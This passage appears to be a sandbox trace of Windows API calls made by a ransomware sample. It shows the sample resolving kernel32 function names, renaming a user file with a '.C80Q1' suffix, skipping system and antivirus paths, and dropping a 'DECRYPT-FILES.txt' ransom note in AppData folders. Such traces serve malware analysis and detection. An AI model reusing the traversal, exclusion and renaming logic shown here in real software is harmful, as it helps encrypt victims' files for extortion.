18 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.139] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.139] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.139] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.139] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.140] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.140] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.140] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.140] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.140] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.140] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.140] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.140] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.140] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.140] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.140] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.140] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.140] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.140] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.140] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.140] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.140] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.140] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.140] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.141] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.141] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.141] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.141] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.141] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.141] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.141] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.141] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.141] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.141] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.141] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.141] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.141] lstrlenA (lpString="DELETEATOM") returned 10 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.141] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.141] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.141] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.141] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.141] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.141] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.141] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.142] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.142] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.142] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.142] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.142] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.142] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.142] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.142] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.142] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.142] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.142] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.142] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.142] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.142] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.142] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.142] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.142] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.142] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.142] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.143] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.143] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.143] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.143] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.143] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.143] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.143] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.143] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.143] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.143] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.143] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.143] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.143] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.143] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.143] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.143] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.143] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.144] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a") returned 66 [0077.144] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a.C80Q1") returned 72 [0077.144] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewvb7v5jhjl32wfh.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a.C80Q1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewvb7v5jhjl32wfh.m4a.c80q1"), dwFlags=0x0) returned 1 [0077.144] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.145] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.145] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.145] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0077.145] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0077.145] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0077.145] lstrcatW (in: lpString1="Identities", lpString2="\\" | out: lpString1="Identities\\") returned="Identities\\" [0077.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Identities\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Program Files") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch=":\\Windows") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Games\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\All Users") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.145] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.146] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="AhnLab") returned 0x0 [0077.146] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0077.146] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.146] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\jkbimi8.tmp") returned 69 [0077.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0077.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0077.146] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.146] wsprintfW (in: param_1=0x3f2e438, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt") returned 75 [0077.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0077.149] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e434, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e434*=0x23fc, lpOverlapped=0x0) returned 1 [0077.150] CloseHandle (hObject=0x444) returned 1 [0077.152] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0077.152] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*" [0077.152] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c98 [0077.153] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.153] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.153] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.153] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.153] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa301b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.153] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.153] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa301b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.153] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.153] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.153] lstrcmpiW (lpString1="tmp", 